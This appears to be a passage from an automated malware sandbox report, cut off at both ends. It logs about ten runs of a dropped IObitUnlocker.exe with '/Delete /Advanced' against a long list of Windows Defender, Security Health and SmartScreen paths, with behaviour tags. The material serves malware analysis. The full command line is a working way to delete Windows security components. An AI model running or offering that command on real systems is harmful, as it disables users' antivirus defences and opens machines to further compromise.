Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:4124
      - C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:2608
      - C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:3472
      - C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:2168
      - C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:4584
      - C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:1352
      - C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:3384
      - C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:4476
      - C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:2052
      - C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:4508
      - C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetWindowsHookEx
        
        PID:1364
      - C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
        
        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 